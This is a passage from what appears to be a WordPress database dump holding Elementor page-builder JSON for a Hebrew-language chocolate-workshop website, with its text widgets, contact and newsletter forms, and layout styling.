\\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c10ea65\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7602a7a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7297bf5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4541ce0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"7952f0ec\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4df9243\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"2024cfba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"34b4157f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"42863b35\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"3bedbf86\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7ee51c99\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"414e8603\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6cd310bc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(563,128,'_elementor_version','0.4'),(564,129,'_wp_page_template','elementor_canvas'),(565,129,'_elementor_edit_mode','builder'),(566,129,'_elementor_data','[{\"id\":\"73f3a63e\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"63f1f80\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5713db43\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57068ba8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"596a5a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"26fa35fd\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 